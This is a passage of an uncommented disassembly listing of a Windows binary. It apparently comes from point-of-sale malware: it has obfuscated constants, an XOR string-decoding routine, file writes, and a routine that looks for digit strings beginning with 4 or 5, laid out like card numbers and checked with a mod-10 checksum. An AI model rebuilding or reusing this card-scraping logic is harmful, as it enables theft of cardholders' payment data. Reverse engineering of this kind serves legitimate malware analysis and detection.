mov ds:1001162Ch, eax
lea eax, ds:10007C54h
mov ds:1000C04Ch, eax
lea eax, ds:100028FDh
mov ds:10011774h, eax
push 1000D020h
call sub_420E93
movsx eax, word ptr ds:100120B8h
movsx edx, word ptr ds:100120A4h
lea eax, [eax+edx+3]
push eax
push 1000F230h
call sub_424172
lea eax, ds:10002609h
mov ds:1000F228h, eax
lea eax, ds:10005013h
mov ds:1000EA30h, eax
lea eax, ds:1000E0F0h
mov ds:1001063Ch, eax
lea eax, ds:1000F260h
mov ds:1000C018h, eax
lea eax, ds:10011670h
mov ds:10012230h, eax
lea eax, [ebp+var_204]
push eax
movsx eax, word ptr ds:1001211Ch
sub eax, 2
push eax
push 0
push 10006211h
mov eax, ds:1001210Ch
sub eax, 3
push eax
push 0
call dword ptr ds:10011B90h
push eax
call dword ptr ds:10010650h
lea eax, [ebp+var_208]
push eax
mov eax, ds:100120F8h
sub eax, 7
push eax
push 0
push 100032ACh
movsx eax, word ptr ds:10012114h
sub eax, 3
push eax
push 0
call dword ptr ds:10011B90h
push eax
call dword ptr ds:10010650h
mov eax, ds:1001209Ch
add eax, 7
mov ds:1000E61Ch, eax
mov eax, ds:100120D8h
sub eax, 2
push eax
lea eax, [ebp+var_FF]
push eax
call sub_41B8EA
add esp, 3Ch
mov eax, ds:100120FCh
add eax, ds:10012128h
cmp [ebp+eax+var_102], 64h
jnz short loc_41DF4D
movsx eax, [ebp+var_FE]
movsx edx, word ptr ds:100120B8h
movsx ecx, word ptr ds:1001211Ch
lea edx, [edx+ecx+1Ch]
sub eax, edx
mov [ebp+var_209], al
movzx eax, [ebp+var_209]
push eax
push 0
call sub_42221E
add esp, 8
mov eax, ds:10012138h
movsx edx, word ptr ds:1001213Ch
add eax, edx
sub eax, 9
mov ds:1000E61Ch, eax
loc_41DF4D: ; CODE XREF: sub_41DD73+18F�j
mov eax, ds:100120DCh
cmp [ebp+eax+var_107], 67h
jnz short loc_41DFA8
mov eax, ds:10012100h
mov edx, ds:10012148h
sub edx, 2
mov [ebp+eax+var_F8], dl
lea eax, [ebp+var_FE]
push eax
call dword ptr ds:1000C054h
mov [ebp-20Ch], eax
push eax
push 10011670h
call sub_422550
add esp, 0Ch
mov eax, ds:10012104h
movsx edx, word ptr ds:10012130h
add eax, edx
sub eax, 6
mov ds:1000E61Ch, eax
loc_41DFA8: ; CODE XREF: sub_41DD73+1E7�j
pop edi
pop esi
leave
retn
sub_41DD73 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ebx
push esi
push edi
mov esi, [ebp+0Ch]
mov edi, [ebp+10h]
push 100138F0h
push esi
call dword ptr ds:10011644h
or eax, eax
jz short loc_41DFD8
mov eax, [ebp+8]
mov [edi], eax
push dword ptr [edi]
mov ebx, [eax]
call dword ptr [ebx+4]
xor eax, eax
jmp short loc_41E020
; ---------------------------------------------------------------------------
loc_41DFD8: ; CODE XREF: .data:0041DFC6�j
push 10013870h
push esi
call dword ptr ds:10011644h
or eax, eax
jz short loc_41DFF8
mov eax, [ebp+8]
mov [edi], eax
push dword ptr [edi]
mov ebx, [eax]
call dword ptr [ebx+4]
xor eax, eax
jmp short loc_41E020
; ---------------------------------------------------------------------------
loc_41DFF8: ; CODE XREF: .data:0041DFE6�j
push 10013850h
push esi
call dword ptr ds:10011644h
or eax, eax
jz short loc_41E018
mov eax, [ebp+8]
mov [edi], eax
push dword ptr [edi]
mov ebx, [eax]
call dword ptr [ebx+4]
xor eax, eax
jmp short loc_41E020
; ---------------------------------------------------------------------------
loc_41E018: ; CODE XREF: .data:0041E006�j
and dword ptr [edi], 0
mov eax, 80004002h
loc_41E020: ; CODE XREF: .data:0041DFD6�j
; .data:0041DFF6�j ...
pop edi
pop esi
pop ebx
pop ebp
retn 0Ch
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E027 proc near ; CODE XREF: .data:0041BD22�p
; sub_4242AF+16E�p ...
var_8 = dword ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push eax
push ebx
push esi
push edi
push 0
push 80h
push 3
push 0
push 3
push 80000000h
push [ebp+arg_0]
call dword ptr ds:10011788h
mov edi, eax
cmp edi, 0FFFFFFFFh
jnz short loc_41E070
cmp [ebp+arg_4], 0
jz short loc_41E06C
mov eax, [ebp+arg_4]
movsx edx, word ptr ds:1001212Ch
add edx, ds:10012124h
sub edx, 6
mov [eax], edx
loc_41E06C: ; CODE XREF: sub_41E027+2E�j
xor eax, eax
jmp short loc_41E0B4
; ---------------------------------------------------------------------------
loc_41E070: ; CODE XREF: sub_41E027+28�j
push 0
push edi
call dword ptr ds:10011624h
mov esi, eax
add eax, 10h
push eax
push 40h
call dword ptr ds:1000EA34h
mov ebx, eax
push 0
cmp [ebp+arg_4], 0
jz short loc_41E099
mov eax, [ebp+arg_4]
mov [ebp+var_8], eax
jmp short loc_41E09F
; ---------------------------------------------------------------------------
loc_41E099: ; CODE XREF: sub_41E027+68�j
lea eax, [ebp+var_4]
mov [ebp+var_8], eax
loc_41E09F: ; CODE XREF: sub_41E027+70�j
push [ebp+var_8]
push esi
push ebx
push edi
call dword ptr ds:1000C028h
push edi
call dword ptr ds:10010650h
mov eax, ebx
loc_41E0B4: ; CODE XREF: sub_41E027+47�j
pop edi
pop esi
pop ebx
leave
retn
sub_41E027 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
mov esi, [ebp+8]
mov eax, [ebp+18h]
mov [ebp+18h], ax
mov eax, ds:1001209Ch
add eax, 7
add eax, ds:10012144h
cmp ds:1000E61Ch, eax
jnb short loc_41E0F3
mov eax, ds:100120A8h
add eax, ds:100120C0h
sub eax, 7
mov ds:1000E61Ch, eax
loc_41E0F3: ; CODE XREF: .data:0041E0DE�j
mov eax, ds:100120D0h
mov edi, eax
add edi, ds:100120BCh
dec edi
jmp short loc_41E10F
; ---------------------------------------------------------------------------
loc_41E103: ; CODE XREF: .data:0041E125�j
lea ebx, ds:1000D130h[edi*4]
cmp esi, ebx
jz short loc_41E127
inc edi
loc_41E10F: ; CODE XREF: .data:0041E101�j
movsx eax, word ptr ds:10012130h
mov edx, ds:100120C4h
lea eax, [eax+edx+3E0h]
cmp edi, eax
jb short loc_41E103
loc_41E127: ; CODE XREF: .data:0041E10C�j
movsx eax, word ptr ds:100120B8h
add eax, 3E6h
cmp edi, eax
jnz short loc_41E13E
xor eax, eax
jmp loc_41E289
; ---------------------------------------------------------------------------
loc_41E13E: ; CODE XREF: .data:0041E135�j
movzx esi, word ptr ds:1000EA50h[edi*2]
mov ebx, ds:10012100h
sub ebx, 2
cmp esi, ebx
jnz short loc_41E17A
movzx eax, byte ptr ds:1000E200h[edi]
push eax
push dword ptr ds:1000C060h[edi*4]
call sub_41F64F
add esp, 8
and dword ptr ds:1000D130h[edi*4], 0
xor eax, eax
jmp loc_41E289
; ---------------------------------------------------------------------------
loc_41E17A: ; CODE XREF: .data:0041E151�j
movzx esi, word ptr ds:1000EA50h[edi*2]
movsx ebx, word ptr ds:100120E4h
add ebx, 0FFF9h
cmp esi, ebx
jnz loc_41E264
mov eax, ds:10012138h
sub eax, 2
mov [ebp-4], eax
jmp loc_41E24B
; ---------------------------------------------------------------------------
loc_41E1A7: ; CODE XREF: .data:0041E25A�j
mov esi, [ebp-4]
mov ebx, esi
shl ebx, 2
cmp dword ptr ds:1000D130h[ebx], 0
jz loc_41E248
movzx edx, word ptr ds:1000EA50h[esi*2]
mov ecx, ds:100120BCh
add ecx, 0FFFEh
cmp edx, ecx
jz short loc_41E248
mov edx, ds:1000C060h[edi*4]
cmp ds:1000C060h[ebx], edx
jnz short loc_41E248
mov bl, ds:1000E200h[esi]
cmp bl, ds:1000E200h[edi]
jnz short loc_41E248
movsx esi, word ptr ds:1001211Ch
mov ebx, [ebp-4]
movzx ebx, word ptr ds:1000EA50h[ebx*2]
mov edx, esi
add edx, esi
mov esi, edx
sub esi, 3
cmp ebx, esi
jnz short loc_41E239
mov esi, [ebp-4]
movzx ebx, byte ptr ds:1000E200h[esi]
push ebx
push dword ptr ds:1000C060h[esi*4]
call sub_41F64F
add esp, 8
and dword ptr ds:1000D130h[edi*4], 0
jmp short loc_41E260
; ---------------------------------------------------------------------------
loc_41E239: ; CODE XREF: .data:0041E212�j
mov esi, [ebp-4]
lea esi, ds:1000EA50h[esi*2]
dec word ptr [esi]
jmp short loc_41E260
; ---------------------------------------------------------------------------
loc_41E248: ; CODE XREF: .data:0041E1B7�j
; .data:0041E1D3�j ...
inc dword ptr [ebp-4]
loc_41E24B: ; CODE XREF: .data:0041E1A2�j
movsx eax, word ptr ds:100120F4h
add eax, 3E8h
cmp [ebp-4], eax
jb loc_41E1A7
loc_41E260: ; CODE XREF: .data:0041E237�j
; .data:0041E246�j
xor eax, eax
jmp short loc_41E289
; ---------------------------------------------------------------------------
loc_41E264: ; CODE XREF: .data:0041E191�j
movzx esi, word ptr ds:1000EA50h[edi*2]
mov ebx, ds:100120C8h
add ebx, ds:100120C4h
sub ebx, 7
cmp esi, ebx
jle short loc_41E287
dec word ptr ds:1000EA50h[edi*2]
loc_41E287: ; CODE XREF: .data:0041E27D�j
xor eax, eax
loc_41E289: ; CODE XREF: .data:0041E139�j
; .data:0041E175�j ...
pop edi
pop esi
pop ebx
leave
retn 24h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E290 proc near ; CODE XREF: sub_41C768+3C�p
; sub_41C768+B3�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
mov eax, [ebp+arg_0]
movzx ebx, byte ptr [eax]
mov eax, ds:1001209Ch
add eax, 0FDh
imul ebx, eax
mov eax, [ebp+arg_0]
movzx eax, byte ptr [eax+1]
add ebx, eax
mov eax, ds:100120D8h
add eax, 0F8h
add eax, ds:10012098h
imul ebx, eax
mov eax, [ebp+arg_0]
movzx eax, byte ptr [eax+2]
add ebx, eax
movsx esi, word ptr ds:100120CCh
sub esi, 7
jmp short loc_41E32C
; ---------------------------------------------------------------------------
loc_41E2DB: ; CODE XREF: sub_41E290+A6�j
mov edi, ds:10012110h
add edi, ds:10012138h
sub edi, 7
sub edi, esi
mov edx, [ebp+arg_4]
mov [ebp+var_4], edx
mov edx, ebx
and edx, 8000003Fh
jge short loc_41E301
dec edx
or edx, 0FFFFFFC0h
inc edx
loc_41E301: ; CODE XREF: sub_41E290+6A�j
mov ecx, ds:1001217Ch
mov dl, [ecx+edx]
mov ecx, [ebp+var_4]
mov [ecx+edi], dl
mov eax, ebx
movsx edi, word ptr ds:1001214Ch
movsx edx, word ptr ds:1001213Ch
lea ecx, [edi+edx+35h]
cdq
idiv ecx
mov ebx, eax
add esi, 1
loc_41E32C: ; CODE XREF: sub_41E290+49�j
mov eax, ds:10012144h
add eax, 4
cmp esi, eax
jl short loc_41E2DB
pop edi
pop esi
pop ebx
leave
retn
sub_41E290 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E33D proc near ; CODE XREF: .data:0041A76F�p
; sub_41A910+2A9�p ...
var_4 = word ptr -4
var_2 = word ptr -2
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
mov edi, [ebp+arg_0]
cmp dword ptr ds:10012150h, 0
jnz short loc_41E365
push 10011BC0h
call dword ptr ds:1000D008h
mov dword ptr ds:10012150h, 1
loc_41E365: ; CODE XREF: sub_41E33D+11�j
mov esi, ds:100120E8h
movsx ebx, word ptr ds:100120F4h
add esi, ebx
sub esi, 3
movzx ebx, byte ptr [edi]
movzx edx, byte ptr [edi+1]
movzx edx, dx
shl edx, 8
or ebx, edx
movzx ebx, bx
add esi, ebx
mov [ebp+var_4], si
movzx eax, [ebp+var_4]
movsx edx, word ptr ds:100120E0h
sub edx, 5
cmp eax, edx
jz short loc_41E418
push 10011BC0h
call dword ptr ds:1001165Ch
movsx eax, word ptr ds:1001214Ch
dec eax
mov [ebp+var_2], ax
jmp short loc_41E3CF
; ---------------------------------------------------------------------------
loc_41E3BA: ; CODE XREF: sub_41E33D+9C�j
movzx eax, [ebp+var_2]
add eax, edi
movsx edx, byte ptr [eax]
movsx ecx, byte ptr [edi+2]
xor edx, ecx
mov [eax], dl
inc [ebp+var_2]
loc_41E3CF: ; CODE XREF: sub_41E33D+7B�j
movzx eax, [ebp+var_2]
movzx edx, [ebp+var_4]
cmp eax, edx
jl short loc_41E3BA
movsx eax, word ptr ds:100120CCh
add eax, ds:10012128h
sub eax, 7
movsx edx, word ptr ds:1001211Ch
sub edx, 2
mov [edi+eax], dl
movsx eax, word ptr ds:10012090h
dec eax
movsx edx, word ptr ds:1001213Ch
sub edx, 7
mov [edi+eax], dl
push 10011BC0h
call dword ptr ds:1001064Ch
loc_41E418: ; CODE XREF: sub_41E33D+62�j
lea eax, [edi+3]
pop edi
pop esi
pop ebx
leave
retn
sub_41E33D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E420 proc near ; CODE XREF: sub_41BEF1+46C�p
var_26C = byte ptr -26Ch
var_26A = byte ptr -26Ah
var_267 = byte ptr -267h
var_168 = byte ptr -168h
var_104 = byte ptr -104h
arg_0 = byte ptr 8
push ebp
mov ebp, esp
sub esp, 26Ch
push esi
push edi
push 104h
lea eax, [ebp+var_104]
push eax
call dword ptr ds:1000E5FCh
lea eax, [ebp+var_168]
push eax
call sub_424555
push 100135E2h
call sub_41E33D
push eax
lea esi, [ebp+var_104]
push esi
call dword ptr ds:1000C020h
lea eax, [ebp+var_168]
push eax
lea eax, [ebp+var_104]
push eax
call dword ptr ds:1000C020h
push 100135DAh
call sub_41E33D
push eax
lea esi, [ebp+var_104]
push esi
call dword ptr ds:1000C020h
add esp, 24h
mov eax, ds:10012144h
add eax, ds:10012100h
mov dl, [ebp+arg_0]
mov [ebp+eax+var_26A], dl
push 0
push 80h
push 4
push 0
movsx eax, word ptr ds:10012140h
movsx edx, word ptr ds:100120E0h
add eax, edx
sub eax, 0Fh
push eax
push 40000000h
lea eax, [ebp+var_104]
push eax
call dword ptr ds:10011788h
mov edi, eax
push 0
lea eax, [ebp+var_26C]
push eax
movsx eax, word ptr ds:10012140h
sub eax, 6
push eax
lea eax, [ebp+var_267]
push eax
push edi
call dword ptr ds:10011B8Ch
push edi
call dword ptr ds:10010650h
pop edi
pop esi
leave
retn
sub_41E420 endp
; =============== S U B R O U T I N E =======================================
sub_41E505 proc near ; CODE XREF: sub_42221E+262�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
mov ecx, esi
movsx eax, word ptr ds:10012130h
movsx edx, word ptr ds:100120CCh
add eax, edx
sub eax, 4
cmp ecx, eax
jge short loc_41E559
mov eax, ds:100120B0h
add eax, ds:100120FCh
sub eax, 3
imul ecx, eax
mov eax, ds:100120D0h
lea eax, [eax+eax+1]
mov edx, esi
add edx, eax
mov eax, ds:10012144h
add eax, 3
add eax, ds:100120BCh
imul edx, eax
sub ecx, edx
jmp loc_41E6A2
; ---------------------------------------------------------------------------
loc_41E559: ; CODE XREF: sub_41E505+1C�j
dec ecx
mov eax, ds:100120DCh
add eax, 0Ch
cmp ecx, eax
jge short loc_41E598
movsx eax, word ptr ds:10012120h
movsx edx, word ptr ds:10012090h
add eax, edx
sub eax, 8
imul ecx, eax
mov eax, ecx
sub eax, esi
mov edx, ds:10012098h
add edx, 5
add edx, ds:100120D8h
mov ecx, eax
sub ecx, edx
jmp loc_41E6A2
; ---------------------------------------------------------------------------
loc_41E598: ; CODE XREF: sub_41E505+5F�j
dec ecx
mov eax, ds:10012100h
add eax, 1Fh
cmp ecx, eax
jge short loc_41E5CC
movsx eax, word ptr ds:10012114h
movsx edx, word ptr ds:10012090h
add eax, edx
sub eax, 2
imul ecx, eax
movsx eax, word ptr ds:100120CCh
add eax, 3Bh
sub ecx, eax
jmp loc_41E6A2
; ---------------------------------------------------------------------------
loc_41E5CC: ; CODE XREF: sub_41E505+9E�j
dec ecx
mov eax, ds:10012148h
add eax, 20h
add eax, ds:10012104h
cmp ecx, eax
jge short loc_41E601
movsx eax, word ptr ds:1001211Ch
add eax, ds:100120C4h
sub eax, 4
imul ecx, eax
mov eax, ds:100120D8h
add eax, 43h
sub ecx, eax
jmp loc_41E6A2
; ---------------------------------------------------------------------------
loc_41E601: ; CODE XREF: sub_41E505+D8�j
dec ecx
mov eax, ds:1001210Ch
add eax, 29h
cmp ecx, eax
jge short loc_41E634
mov eax, ds:100120FCh
add eax, ds:100120ACh
sub eax, 3
imul ecx, eax
mov eax, ds:10012110h
add eax, 47h
movsx edx, word ptr ds:10012108h
add eax, edx
sub ecx, eax
jmp short loc_41E6A2
; ---------------------------------------------------------------------------
loc_41E634: ; CODE XREF: sub_41E505+107�j
dec ecx
mov eax, ds:100120D4h
add eax, 36h
cmp ecx, eax
jge short loc_41E65C
mov eax, ds:100120C0h
dec eax
imul ecx, eax
mov eax, ds:100120C0h
add eax, 64h
add eax, ds:10012100h
sub ecx, eax
jmp short loc_41E6A2
; ---------------------------------------------------------------------------
loc_41E65C: ; CODE XREF: sub_41E505+13A�j
dec ecx
movsx eax, word ptr ds:100120A4h
movsx edx, word ptr ds:100120CCh
lea eax, [eax+edx+2Dh]
cmp ecx, eax
jge short loc_41E696
mov eax, ds:10012094h
add eax, ds:100120A8h
sub eax, 2
imul ecx, eax
mov eax, ds:100120C4h
add eax, 69h
add eax, ds:10012100h
sub ecx, eax
jmp short loc_41E6A2
; ---------------------------------------------------------------------------
loc_41E696: ; CODE XREF: sub_41E505+16C�j
movsx eax, word ptr ds:10012130h
add eax, 35h
sub ecx, eax
loc_41E6A2: ; CODE XREF: sub_41E505+4F�j
; sub_41E505+8E�j ...
mov eax, ecx
pop esi
retn
sub_41E505 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push 10011784h
call dword ptr ds:1000EA3Ch
mov eax, ds:10011784h
pop ebp
retn 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E6BD proc near ; CODE XREF: sub_41A910+BB3�p
var_30C = dword ptr -30Ch
var_308 = dword ptr -308h
var_304 = dword ptr -304h
var_300 = dword ptr -300h
var_2FC = dword ptr -2FCh
var_2F8 = dword ptr -2F8h
var_2F4 = dword ptr -2F4h
var_2F0 = dword ptr -2F0h
var_2EC = dword ptr -2ECh
var_2E8 = dword ptr -2E8h
var_2E4 = dword ptr -2E4h
var_2E0 = dword ptr -2E0h
var_2DC = dword ptr -2DCh
var_2D8 = dword ptr -2D8h
var_2D4 = dword ptr -2D4h
var_2D0 = dword ptr -2D0h
var_2CC = dword ptr -2CCh
var_2C8 = dword ptr -2C8h
var_2C4 = dword ptr -2C4h
var_2BE = byte ptr -2BEh
var_2BC = dword ptr -2BCh
var_2B8 = dword ptr -2B8h
var_2B4 = dword ptr -2B4h
var_2B0 = dword ptr -2B0h
var_2AC = dword ptr -2ACh
var_2A8 = dword ptr -2A8h
var_2A4 = dword ptr -2A4h
var_2A0 = dword ptr -2A0h
var_29C = dword ptr -29Ch
var_298 = dword ptr -298h
var_294 = dword ptr -294h
var_290 = dword ptr -290h
var_28C = dword ptr -28Ch
var_288 = dword ptr -288h
var_284 = dword ptr -284h
var_280 = dword ptr -280h
var_27C = dword ptr -27Ch
var_278 = dword ptr -278h
var_274 = dword ptr -274h
var_270 = dword ptr -270h
var_26C = dword ptr -26Ch
var_268 = dword ptr -268h
var_264 = dword ptr -264h
var_260 = dword ptr -260h
var_25C = dword ptr -25Ch
var_258 = dword ptr -258h
var_253 = byte ptr -253h
var_23F = byte ptr -23Fh
var_140 = dword ptr -140h
var_13C = dword ptr -13Ch
var_138 = dword ptr -138h
var_134 = dword ptr -134h
var_130 = dword ptr -130h
var_12C = dword ptr -12Ch
var_128 = dword ptr -128h
var_124 = dword ptr -124h
var_120 = dword ptr -120h
var_11C = dword ptr -11Ch
var_118 = dword ptr -118h
var_114 = dword ptr -114h
var_110 = dword ptr -110h
var_10C = dword ptr -10Ch
var_106 = byte ptr -106h
var_104 = byte ptr -104h
var_102 = word ptr -102h
var_100 = byte ptr -100h
var_FF = byte ptr -0FFh
var_FC = byte ptr -0FCh
var_FB = byte ptr -0FBh
var_F8 = byte ptr -0F8h
var_F3 = byte ptr -0F3h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 30Ch
push ebx
push esi
push edi
cmp [ebp+arg_4], 0
jz loc_41F611
mov eax, [ebp+arg_0]
mov al, [eax]
cmp al, 34h
jz short loc_41E6E4
cmp al, 35h
jnz loc_41F611
loc_41E6E4: ; CODE XREF: sub_41E6BD+1D�j
mov eax, [ebp+arg_0]
mov ecx, eax
or eax, 0FFFFFFFFh
loc_41E6EC: ; CODE XREF: sub_41E6BD+34�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_41E6EC
mov [ebp+var_128], eax
movsx edx, word ptr ds:100120B8h
mov ecx, ds:1001209Ch
lea edx, [edx+ecx+0Bh]
cmp eax, edx
jz short loc_41E71F
mov edx, ds:10012094h
add edx, 13h
cmp eax, edx
jnz loc_41F611
loc_41E71F: ; CODE XREF: sub_41E6BD+4F�j
mov eax, ds:100120B0h
mov ebx, eax
add ebx, ds:100120C0h
sub ebx, 8
jmp short loc_41E755
; ---------------------------------------------------------------------------
loc_41E731: ; CODE XREF: sub_41E6BD+AB�j
mov eax, 30h
mul ebx
mov [ebp+var_260], eax
mov eax, [ebp+arg_4]
mov edx, [ebp+var_260]
cmp ds:1000F370h[edx], eax
jz loc_41F611
inc ebx
loc_41E755: ; CODE XREF: sub_41E6BD+72�j
mov eax, ds:100120E8h
add eax, 5Ah
movsx edx, word ptr ds:1001212Ch
add eax, edx
cmp ebx, eax
jb short loc_41E731
mov eax, ds:10012148h
add eax, 0Eh
add eax, ds:100120D8h
cmp [ebp+var_128], eax
jnz loc_41E95C
mov eax, [ebp+arg_0]
mov al, [eax+4]
cmp al, 2Dh
jz short loc_41E796
cmp al, 20h
jnz loc_41F611
loc_41E796: ; CODE XREF: sub_41E6BD+CF�j
mov eax, [ebp+arg_0]
mov al, [eax+9]
cmp al, 2Dh
jz short loc_41E7A8
cmp al, 20h
jnz loc_41F611
loc_41E7A8: ; CODE XREF: sub_41E6BD+E1�j
mov eax, [ebp+arg_0]
mov al, [eax+0Eh]
cmp al, 2Dh
jz short loc_41E7BA
cmp al, 20h
jnz loc_41F611
loc_41E7BA: ; CODE XREF: sub_41E6BD+F3�j
mov eax, ds:100120D4h
movsx edx, word ptr ds:100120F0h
add eax, edx
mov edx, [ebp+arg_0]
mov dl, [edx]
mov [ebp+eax+var_104], dl
mov eax, ds:100120C0h
add eax, ds:100120B0h
mov edx, [ebp+arg_0]
mov dl, [edx+1]
mov [ebp+eax+var_106], dl
movsx eax, word ptr ds:10012130h
mov edx, [ebp+arg_0]
mov dl, [edx+2]
mov byte ptr [ebp+eax+var_102+1], dl
mov eax, ds:100120ECh
mov edx, [ebp+arg_0]
mov dl, [edx+3]
mov [ebp+eax+var_FC], dl
mov eax, ds:10012138h
add eax, ds:100120A8h
mov edx, [ebp+arg_0]
mov dl, [edx+5]
mov byte ptr [ebp+eax+var_102+1], dl
movsx eax, word ptr ds:100120F0h
mov edx, [ebp+arg_0]
mov dl, [edx+6]
mov [ebp+eax+var_FF], dl
movsx eax, word ptr ds:10012114h
add eax, ds:10012098h
mov edx, [ebp+arg_0]
mov dl, [edx+7]
mov byte ptr [ebp+eax+var_102+1], dl
mov eax, ds:100120BCh
add eax, 6
movsx edx, word ptr ds:100120F4h
add eax, edx
mov edx, [ebp+arg_0]
mov dl, [edx+8]
mov [ebp+eax+var_FF], dl
movsx eax, word ptr ds:100120A4h
add eax, ds:10012110h
mov edx, [ebp+arg_0]
mov dl, [edx+0Ah]
mov [ebp+eax+var_104], dl
mov eax, ds:10012124h
mov edx, [ebp+arg_0]
mov dl, [edx+0Bh]
mov [ebp+eax+var_F8], dl
mov eax, ds:100120C0h
add eax, 7
add eax, ds:10012094h
mov edx, [ebp+arg_0]
mov dl, [edx+0Ch]
mov [ebp+eax+var_FF], dl
mov eax, ds:10012100h
add eax, 2
movsx edx, word ptr ds:100120E4h
add eax, edx
mov edx, [ebp+arg_0]
mov dl, [edx+0Dh]
mov [ebp+eax+var_FF], dl
mov eax, ds:10012110h
mov edx, [ebp+arg_0]
mov dl, [edx+0Fh]
mov [ebp+eax+var_FB], dl
mov eax, ds:100120FCh
add eax, 5
movsx edx, word ptr ds:100120F0h
add eax, edx
mov edx, [ebp+arg_0]
mov dl, [edx+10h]
mov [ebp+eax+var_FF], dl
mov eax, ds:100120DCh
movsx edx, word ptr ds:10012140h
add eax, edx
mov edx, [ebp+arg_0]
mov dl, [edx+11h]
mov [ebp+eax+var_100], dl
mov eax, ds:1001210Ch
mov edx, [ebp+arg_0]
mov dl, [edx+12h]
mov [ebp+eax+var_F3], dl
movsx eax, word ptr ds:100120A0h
mov edx, ds:100120C0h
lea eax, [eax+edx+8]
movsx edx, word ptr ds:1001213Ch
sub edx, 7
mov [ebp+eax+var_FF], dl
jmp short loc_41E96B
; ---------------------------------------------------------------------------
loc_41E95C: ; CODE XREF: sub_41E6BD+C1�j
push [ebp+arg_0]
lea eax, [ebp+var_FF]
push eax
call sub_42509D
loc_41E96B: ; CODE XREF: sub_41E6BD+29D�j
movsx esi, word ptr ds:100120F4h
jmp short loc_41E989
; ---------------------------------------------------------------------------
loc_41E974: ; CODE XREF: sub_41E6BD+2DF�j
mov al, [ebp+esi+var_FF]
cmp al, 30h
jl short loc_41E983
cmp al, 39h
jle short loc_41E988
loc_41E983: ; CODE XREF: sub_41E6BD+2C0�j
jmp loc_41F611
; ---------------------------------------------------------------------------
loc_41E988: ; CODE XREF: sub_41E6BD+2C4�j
inc esi
loc_41E989: ; CODE XREF: sub_41E6BD+2B5�j
mov eax, ds:10012138h
add eax, 7
movsx edx, word ptr ds:100120CCh
add eax, edx
cmp esi, eax
jb short loc_41E974
mov eax, ds:100120DCh
sub eax, 8
mov [ebp-108h], eax
mov eax, ds:100120C4h
movsx edx, word ptr ds:10012118h
mov esi, eax
add esi, edx
sub esi, 0Dh
jmp short loc_41EA06
; ---------------------------------------------------------------------------
loc_41E9C1: ; CODE XREF: sub_41E6BD+35D�j
movsx eax, [ebp+esi+var_FF]
sub eax, 30h
mov edx, ds:10012128h
add edx, 2
imul eax, edx
add [ebp-108h], eax
cmp [ebp+esi+var_FF], 34h
jle short loc_41E9F6
mov eax, ds:100120BCh
add eax, 8
sub [ebp-108h], eax
loc_41E9F6: ; CODE XREF: sub_41E6BD+329�j
mov eax, ds:100120C4h
add eax, ds:10012138h
sub eax, 4
add esi, eax
loc_41EA06: ; CODE XREF: sub_41E6BD+302�j
movsx eax, word ptr ds:100120B8h
movsx edx, word ptr ds:100120B4h
lea eax, [eax+edx+9]
cmp esi, eax
jb short loc_41E9C1
mov eax, ds:100120E8h
movsx edx, word ptr ds:100120B8h
mov ebx, eax
add ebx, edx
sub ebx, 7
jmp short loc_41EA4E
; ---------------------------------------------------------------------------
loc_41EA31: ; CODE XREF: sub_41E6BD+3A5�j
movsx eax, [ebp+ebx+var_FF]
sub eax, 30h
add [ebp-108h], eax
movsx eax, word ptr ds:100120E4h
sub eax, 4
add ebx, eax
loc_41EA4E: ; CODE XREF: sub_41E6BD+372�j
movsx eax, word ptr ds:10012118h
movsx edx, word ptr ds:10012108h
lea eax, [eax+edx+2]
cmp ebx, eax
jb short loc_41EA31
mov eax, [ebp-108h]
mov ecx, 0Ah
xor edx, edx
div ecx
mov edi, ds:10012148h
sub edi, 2
cmp edx, edi
jnz loc_41F611
lea eax, [ebp+var_FF]
push eax
call dword ptr ds:10011774h
pop ecx
or eax, eax
jnz loc_41F611
mov eax, ds:100120FCh
mov esi, eax
add esi, ds:10012104h
sub esi, 5
movsx eax, word ptr ds:1001212Ch
mov esi, eax
add esi, ds:100120DCh
sub esi, 0Ch
jmp short loc_41EAD6
; ---------------------------------------------------------------------------
loc_41EABE: ; CODE XREF: sub_41E6BD+423�j
mov eax, 30h
mul esi
mov [ebp+var_264], eax
cmp dword ptr ds:1000F370h[eax], 0
jz short loc_41EAE2
inc esi
loc_41EAD6: ; CODE XREF: sub_41E6BD+3FF�j
mov eax, ds:100120ECh
add eax, 64h
cmp esi, eax
jb short loc_41EABE
loc_41EAE2: ; CODE XREF: sub_41E6BD+416�j
movsx eax, word ptr ds:100120F0h
add eax, 5Fh
cmp esi, eax
jz loc_41F611
mov eax, 30h
mul esi
mov [ebp+var_268], eax
mov eax, [ebp+arg_4]
mov edx, [ebp+var_268]
mov ds:1000F370h[edx], eax
push 100135C8h
call sub_41E33D
pop ecx
push 0
push eax
push 0
push [ebp+arg_4]
call dword ptr ds:10011638h
mov [ebp+var_134], eax
test eax, eax
jnz short loc_41EB3D
mov eax, [ebp+arg_4]
mov [ebp+var_134], eax
loc_41EB3D: ; CODE XREF: sub_41E6BD+475�j
push 100135BBh
call sub_41E33D
push eax
push [ebp+var_134]
call sub_41FD91
mov [ebp+var_12C], eax
push 100135B2h
push eax
call sub_41FD91
add esp, 14h
mov [ebp+var_26C], eax
mov eax, 30h
mul esi
mov [ebp+var_270], eax
mov edi, [ebp+var_26C]
mov ebx, eax
mov ds:1000F374h[ebx], edi
push 0
mov eax, 30h
mul esi
mov [ebp+var_274], eax
push dword ptr ds:1000F374h[eax]
call dword ptr ds:10011658h
lea eax, [ebp+var_11C]
push eax
push [ebp+var_12C]
call dword ptr ds:10011650h
push 0
call dword ptr ds:1000E5E8h
